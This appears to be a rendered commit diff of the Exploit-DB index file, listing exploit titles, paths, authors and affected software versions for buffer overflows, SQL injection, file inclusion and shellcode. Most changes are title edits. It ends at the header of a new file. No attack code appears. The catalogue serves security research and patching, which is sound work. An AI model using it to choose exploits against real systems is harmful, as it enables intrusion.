5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
5249,platforms/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0
5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,windows,remote,0
@ -10905,7 +10911,7 @@ id,file,description,date,author,platform,type,port
17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0
17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe ovutil Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0
17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,windows,remote,0
17048,platforms/windows/remote/17048.rb,"VideoLAN VLC Media Player - AMV Dangling Pointer (Metasploit)",2011-03-26,Metasploit,windows,remote,0
17048,platforms/windows/remote/17048.rb,"VideoLAN VLC Media Player 1.1.4 - 'AMV' Dangling Pointer (Metasploit)",2011-03-26,Metasploit,windows,remote,0
17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0
17058,platforms/linux/remote/17058.rb,"Distributed Ruby - Send instance_eval/syscall Code Execution (Metasploit)",2011-03-27,Metasploit,linux,remote,0
17063,platforms/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0
@ -10928,7 +10934,7 @@ id,file,description,date,author,platform,type,port
17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 (build 2055) - Buffer Overflow",2011-05-04,xsploitedsec,windows,remote,0
17240,platforms/windows/remote/17240.html,"ICONICS WebHMI - ActiveX Stack Overflow",2011-05-03,"sgb and bls",windows,remote,0
17244,platforms/hardware/remote/17244.txt,"ZyWALL USG - Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",hardware,remote,0
17252,platforms/windows/remote/17252.rb,"VideoLAN VLC Media Player - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,remote,0
17252,platforms/windows/remote/17252.rb,"VideoLAN VLC Media Player 1.1.8 - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,remote,0
17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 - Content-Type Buffer Overflow (Metasploit)",2011-05-11,Metasploit,windows,remote,0
17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI - ActiveX Buffer Overflow (Metasploit)",2011-05-10,Metasploit,windows,remote,0
17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,hardware,remote,0
@ -11147,7 +11153,7 @@ id,file,description,date,author,platform,type,port
18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0
18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject (Metasploit)",2012-05-01,Metasploit,windows,remote,0
18818,platforms/windows/remote/18818.py,"SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote,0
18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0
18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0
18834,platforms/php/remote/18834.rb,"PHP - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0
18836,platforms/php/remote/18836.py,"PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote,0
18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
@ -13788,6 +13794,7 @@ id,file,description,date,author,platform,type,port
31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote,0
31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",windows,remote,0
31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",windows,remote,0
40760,platforms/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - SEH Overflow (Metasploit)",2016-11-15,"Tracy Turben",windows,remote,0
31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0
31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0
31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555
@ -15019,7 +15026,7 @@ id,file,description,date,author,platform,type,port
40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
@ -15056,13 +15063,14 @@ id,file,description,date,author,platform,type,port
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise - Login Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40736,platforms/hardware/remote/40736.txt,"NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40737,platforms/hardware/remote/40737.sh,"NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40738,platforms/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547
40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -17344,7 +17352,7 @@ id,file,description,date,author,platform,type,port
3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog 2.52 - (postid) Blind SQL Injection",2007-04-03,ajann,php,webapps,0
3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - 'xmlrpc' SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps,0
3657,platforms/php/webapps/3657.txt,"MySpeach 3.0.7 - Remote / Local File Inclusion",2007-04-03,Xst3nZ,php,webapps,0
3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - (customize.php l) Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0
3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0
3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion",2007-04-04,kezzap66345,php,webapps,0
3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0
3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0
@ -17625,8 +17633,8 @@ id,file,description,date,author,platform,type,port
4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - 'wp-app.php' Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0
4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0
4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Parameter Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting",2007-06-28,GoLd_M,php,webapps,0
4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion",2007-06-28,Katatafish,php,webapps,0
4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - (login.php rid) SQL Injection",2007-06-28,r00t,php,webapps,0
@ -18354,34 +18362,34 @@ id,file,description,date,author,platform,type,port
5203,platforms/php/webapps/5203.txt,"PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0
5204,platforms/php/webapps/5204.py,"Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure",2008-02-28,"Julien CAYSSOL",php,webapps,0
5206,platforms/php/webapps/5206.txt,"Dream4 Koobi CMS 4.3.0 < 4.2.3 - 'categ' Parameter SQL Injection",2008-02-29,JosS,php,webapps,0
5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0
5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - (mod_project_id) SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0
5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' Parameter SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - 'userid' Parameter SQL Injection",2008-03-01,"SoSo H H",php,webapps,0
5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - 'mod_project_id' Parameter SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0
5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' Parameter SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,php,webapps,0
5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' SQL Injection",2008-03-06,S@BUN,php,webapps,0
5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' SQL Injection",2008-03-06,S@BUN,php,webapps,0
5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' Parameter SQL Injection",2008-03-06,S@BUN,php,webapps,0
5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' Parameter SQL Injection",2008-03-06,S@BUN,php,webapps,0
5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 - Remote Add Admin",2008-03-07,"Charles Fol",php,webapps,0
5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Arbitrary File Upload",2008-03-07,"Charles Fol",php,webapps,0
5221,platforms/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - (cID) SQL Injection",2008-03-08,S@BUN,php,webapps,0
5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - (qti_usr.php id) SQL Injection",2008-03-09,croconile,php,webapps,0
5221,platforms/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - 'cid' Parameter SQL Injection",2008-03-08,S@BUN,php,webapps,0
5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - 'qti_usr.php' SQL Injection",2008-03-09,croconile,php,webapps,0
5223,platforms/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps,0
5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - (cat) SQL Injection",2008-03-10,Don,php,webapps,0
5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - (archives.php msg_id) SQL Injection",2008-03-10,"Charles Fol",php,webapps,0
5232,platforms/php/webapps/5232.txt,"Mapbender 2.4.4 - (mapFiler.php) Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0
5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0
5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - 'cat' Parameter SQL Injection",2008-03-10,Don,php,webapps,0
5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - 'msg_id' Parameter SQL Injection",2008-03-10,"Charles Fol",php,webapps,0
5232,platforms/php/webapps/5232.txt,"Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0
5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - 'gaz' Parameter SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0
5234,platforms/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,php,webapps,0
5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase - 'id' SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0
5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase 2.0 - 'id' Parameter SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0
5237,platforms/php/webapps/5237.txt,"Joomla! Component ProductShowcase 1.5 - SQL Injection",2008-03-11,S@BUN,php,webapps,0
5239,platforms/php/webapps/5239.php,"Danneo CMS 0.5.1 - Blind SQL Injection",2008-03-11,InATeam,php,webapps,0
5240,platforms/php/webapps/5240.htm,"QuickTalk Forum 1.6 - Blind SQL Injection",2008-03-12,t0pP8uZz,php,webapps,0
5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0
5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0
5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - 'gid' Parameter SQL Injection",2008-03-12,S@BUN,php,webapps,0
5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - 'gid' Parameter SQL Injection",2008-03-12,S@BUN,php,webapps,0
5243,platforms/php/webapps/5243.txt,"Fully Modded phpBB - 'kb.php' SQL Injection",2008-03-12,TurkishWarriorr,php,webapps,0
5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - SQL Injection",2008-03-12,S@BUN,php,webapps,0
5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0
5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials 2.1b - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0
5246,platforms/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
5247,platforms/php/webapps/5247.txt,"easygallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
5247,platforms/php/webapps/5247.txt,"EasyGallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0
5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0
5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - (kid) SQL Injection",2008-03-14,S@BUN,php,webapps,0
@ -19179,7 +19187,7 @@ id,file,description,date,author,platform,type,port
6249,platforms/php/webapps/6249.txt,"ZeeJobsite 2.0 - (adid) SQL Injection",2008-08-15,"Hussin X",php,webapps,0
6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps,0
6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0
6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) SQL Injection",2008-08-17,"Hussin X",php,webapps,0
6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - 'cat' Parameter SQL Injection",2008-08-17,"Hussin X",php,webapps,0
6258,platforms/php/webapps/6258.txt,"PHPBasket - 'product.php pro_id' SQL Injection",2008-08-17,r45c4l,php,webapps,0
6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0
6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0
@ -20605,7 +20613,7 @@ id,file,description,date,author,platform,type,port
8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0
8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection",2009-03-16,SirGod,php,webapps,0
8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection / SQL Injection",2009-03-16,SirGod,php,webapps,0
8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - (entry_id) SQL Injection",2009-03-16,boom3rang,php,webapps,0
8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - 'entry_id' Parameter SQL Injection",2009-03-16,boom3rang,php,webapps,0
8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0
8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0
8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0
@ -21237,7 +21245,7 @@ id,file,description,date,author,platform,type,port
9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion",2009-07-27,GoLd_M,php,webapps,0
9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0
9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - (linkout.php id) SQL Injection",2009-07-28,MizoZ,php,webapps,0
9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' Parameter SQL Injection",2009-07-28,MizoZ,php,webapps,0
9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection",2009-07-28,Dante90,php,webapps,0
9290,platforms/php/webapps/9290.txt,"In-portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps,0
9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0
@ -22008,7 +22016,7 @@ id,file,description,date,author,platform,type,port
10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0
10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10873,platforms/php/webapps/10873.txt,"Myiosoft EasyGallery - 'catid' Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10874,platforms/php/webapps/10874.txt,"Pre News Manager - (nid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10877,platforms/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
@ -28846,11 +28854,6 @@ id,file,description,date,author,platform,type,port
27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 - show.php MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps,0
27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 - comment.php UserID Parameter Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0
27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 - contact.php UserID Parameter Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0
27349,platforms/php/webapps/27349.txt,"phpArcadeScript 2.0 - tellafriend.php gamename Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
27350,platforms/php/webapps/27350.txt,"phpArcadeScript 2.0 - loginbox.php login_status Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
27351,platforms/php/webapps/27351.txt,"phpArcadeScript 2.0 - 'index.php' submissionstatus Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
27352,platforms/php/webapps/27352.txt,"phpArcadeScript 2.0 - browse.php Multiple Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
27353,platforms/php/webapps/27353.txt,"phpArcadeScript 2.0 - displaygame.php gamefile Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0
27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0
27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - Title Field HTML Injection",2006-03-06,Kiki,php,webapps,0
@ -29116,7 +29119,6 @@ id,file,description,date,author,platform,type,port
28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0
28054,platforms/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0
27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0
27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 - EasyGallery.php Cross-Site Scripting",2006-04-20,botan,php,webapps,0
27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - member.php Cross-Site Scripting",2006-04-20,Qex,php,webapps,0
27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0
27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
@ -30084,7 +30086,6 @@ id,file,description,date,author,platform,type,port
29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - blog.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0
29052,platforms/php/webapps/29052.txt,"Bloo 1.00 - Googlespell_Proxy.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
29055,platforms/php/webapps/29055.txt,"Eggblog 3.1 - admin/articles.php edit Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
@ -31429,7 +31430,6 @@ id,file,description,date,author,platform,type,port
31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component - SQL Injection",2008-02-12,S@BUN,php,webapps,0
31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0
31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection",2008-03-04,bius,php,webapps,0
31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0
40357,platforms/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",hardware,webapps,80
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0

Can't render this file because it is too large.

198
platforms/linux/dos/40762.c Executable file
View file

@ -0,0 +1,198 @@
/*
